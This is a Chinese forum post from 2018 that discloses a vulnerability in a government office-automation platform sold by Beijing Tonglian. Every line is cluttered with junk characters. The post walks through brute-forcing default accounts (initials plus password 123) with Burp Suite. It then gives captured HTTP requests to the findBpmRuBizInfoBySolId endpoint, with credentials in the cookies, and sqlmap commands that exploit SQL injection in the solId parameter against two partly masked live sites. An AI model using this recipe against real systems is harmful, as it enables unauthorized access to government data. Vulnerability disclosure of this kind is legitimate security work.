|
; z0 ` R% m K( J* ^% k
+ |0 h! v8 ?$ ^: g
! k6 V1 [% A' L' c
2 ^1 s k% d0 ^/ u) G2 ] 平台简介:* t2 q7 q! ^9 ^% R) j
4 B; c- g P0 o) l- h& \: G: [
$ [1 Q( F5 s$ f 6 O9 ?2 ?; ^: @: K
, A# `. H8 f' K* s% g) N
. E; r- S$ c) c+ n$ H% R. y& a3 D$ ^
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
1 Q) V X( {& K
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" \4 w3 ~- L( @' j6 l! ]9 L
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!- p6 D& H' m1 |1 ?& ~7 w
! Y) |! H8 Q# q' i D2 n
5 v( \# ?0 u( H2 G; l3 k* {
4 L5 c# _' l4 J
, H V! I1 \6 @6 x
+ N3 I0 V! \0 g' T5 u' ~9 s 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:4 T( Q0 o- I7 G2 f& B$ r
5 ~0 ]0 B" _7 n5 ~2 l6 v( _4 l: l
* F1 |6 A4 G1 C( O1 k8 J+ M
/ W, h4 R A# t7 k7 I
; I2 x$ P% u" A' X. G
* K0 P7 ]2 ]4 W7 K8 j http://1.1.1.1:7197/cap-aco/#(案例2-)' }5 |$ i$ c- J/ ~" j& u
; q# `- ?; Q h5 k5 E
3 p. V! M+ Q/ B6 e2 ]& [& q http://www.XXOO.com (案例1-官网网站)
7 d) B4 } n* N( e0 L " @% u F: I8 v$ O# a- n0 I3 Q2 \
5 M2 v8 @) r' Y
3 Y+ R; n/ E2 w& r, g* Q # v% C$ o$ t/ J: Y: o
, s2 h% L* N, a( k" ]9 x 漏洞详情:
- U! q5 f e; U* P+ U5 i: w
( @! L+ v7 @) ?4 Y7 C! n: B8 ^2 j; k- m2 W: |4 Z! D
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
+ r" j1 C- y" N; r * Z$ D4 J# t7 }; P' ]0 d
$ Y) Y4 e1 s8 a* Z 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
! D$ n5 g/ N: v; k8 Q+ R4 I3 r ?7 N5 R5 B; n! {
& [1 \( O* G0 S6 s
4 u' P- }; \* M% [ : [- H2 B' f# k5 K3 M2 r
" v- ]+ T) _% y3 {1 h) q 
: ^9 |& m0 s2 @) S% z" B' j * R8 H' R2 M" w0 i
5 [5 F! ^% q F5 g
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
/ X; [' l+ v- M0 g3 ]
( H, ^5 p2 T# E' s; U$ E# m l" o. ]6 y( l2 G: M2 x& |# u
1、案例1-官方网站
8 Y; p9 A% X( W2 G ; W! g4 ]- g) {# X P
0 V' Z, J% W3 f* V4 ?! c4 ] GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
) U" f3 l' Y; n " S+ Q! a0 e8 x. y; h0 Q. A& ^: c
a W, W; k+ n3 K; }
Host: www.XXOO.com0 L1 T x) A1 w' s/ q' ^6 R* \
! ]' h3 D& Y8 ]; e* H
* a% w4 n: L+ M* f" F5 s( r+ F
Proxy-Connection: Keep-Alive, F" O# o+ n: a- k2 ?9 j
7 U( ~2 [( |+ h3 @+ q/ D* c/ M8 M2 c: i$ ?: N0 I& I
Accept: application/json, text/javascript, */*; q=0.01% \; M7 l) Y% a6 {" }7 n
5 g: z. w- B; d; A2 n# K) z- E+ M+ C$ N
Accept-Language: zh-CN O( S/ F, x4 F: k* I
! b( @4 y% ^* ~, Y9 g) O1 g! \, a9 D8 \ E. S6 b7 }/ c- k( x
Content-Type: application/json. u0 g- A8 `: r
6 A" d( d7 |5 Y4 Q0 M# p! |: l% [
7 ^5 c9 [; x1 u; n$ w6 j: W
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko1 B- v7 h# d2 ~/ g! K
8 F. t- [$ X! W# d# ?! m' u
- H( |6 c/ y8 E/ }' x1 Z X-Requested-With: XMLHttpRequest
; }( \0 L: M; D, r9 ?3 a4 C
$ r3 F6 M a$ H8 k! i. i5 @- ]0 D u+ A( L9 O; ]) ~) H% x
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
n7 q8 l( s9 r) I7 [9 }! ~& \
( i% c6 {2 b- R( b6 K7 i1 i
, V: O7 l U" W' j Accept-Encoding: gzip, deflate, sdch/ Y% U! {% |, U- m4 ^ R: s w
2 E7 _2 S( U& i- s: M1 \4 I
! `& F2 ^0 w4 s# N5 _! j
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
. {$ g0 b# e0 q# `1 j# q' I ) x0 L0 C8 i8 Y8 Q; R
H* m7 U+ J% f. @ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:9 S( h# m- m3 R& B) |- M
- R0 g! H6 E1 h1 c4 K( X: ]
$ }0 N3 d6 k* g; m+ [" x 
, R3 ?( k% Y# @
6 a8 X6 r% J4 ]% C* T# V8 `5 d4 p( T. P/ Z/ c
+ E3 j, s$ A; F/ i4 J X2 Z0 H- N. I y( ~
( f3 O y9 ?% I
* |7 C+ h8 K- ]" O" l- F
* k k$ ?1 U, g) G2 |
9 q& @. S9 p( A) F) l3 k1 ~ z 0 J L* p7 t- [" q w
' t8 f" |2 G9 U) X2 Q: X5 o, N8 |0 `! K8 {" ?+ @' T2 D( H" _8 T
. u& c/ L9 Z e# Y& x- Y
N j* J) P% k; ^' b3 b5 S8 G
" `, K; c" K# |- P+ I. v6 {
2、案例2-某天河云平台
+ \& m1 R" X# I. B3 u m! B6 D 4 h) o( h6 @$ ~
# K) c3 t m1 P0 a8 F
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
: A% Z" c5 B% e7 k
8 _. x% b( U% I$ a E" a# G+ o; z) {% f$ S+ r
Host: 1.1.1.:71975 Z4 r1 G m, u8 ~
6 I4 W% K4 N" |0 ]& E# K) ~! K) A
. z: `2 w8 L' a& o1 L2 T' l* ^ Accept: application/json, text/javascript, */*; q=0.017 P9 u7 _- s+ _$ p, i6 k2 {* s
7 f% ]* |* ^* d8 O: r. C/ S: A A6 Y: d& G! F' y
X-Requested-With: XMLHttpRequest
) B& a* L6 x. w. O7 C
8 ^$ X2 d& ^' o0 I; r! m( o9 L( |+ ^3 l! r, d2 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.04 d3 G- J& y7 _1 }6 U. W
8 S5 m9 q! U: T0 b% [# Z
: u3 G9 X8 E' L* q3 ?
Content-Type: application/json
3 q6 {* h4 e! B. L0 t( T8 B + l* `) b+ V( m2 S& z! R" c
, L1 ?8 g" O C3 \% P- R1 p Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
s! T/ [# b" Q) B$ v p7 j! I1 U8 I0 j6 w% c+ ?, ?( X
6 T3 q( c0 M" G% `1 J
Accept-Language: zh-CN,zh;q=0.8- `( i# _. P h: e2 l8 t# \- c L
0 E/ ~" |4 e7 ]. f) F. I7 _( y2 |0 V6 n: o1 `
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=11 B7 ]! q6 W0 J) j# n) A9 o
, z% I, H5 u! _& ]# q
, s1 `+ l! y! R Connection: close( Y# P# t: H/ ]/ p) C
" ?1 C+ J. w) I- B; z4 v' r0 z9 X* d4 i
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:1 X/ R3 K( W. t% q
( W" M1 q5 ?5 @" C7 I2 m5 X+ [
8 B" R1 _% X/ d! q  ) R0 m+ z% A) |3 n5 f2 z) N) h
6 t- [' T, N" t/ s- b( ^
7 _' ^# ~* ?7 @2 B$ b0 ^. u4 g
9 S6 O! J" ~& F1 y5 y- v | 
发表于 2018-10-20 20:15:17
收藏
支持
反对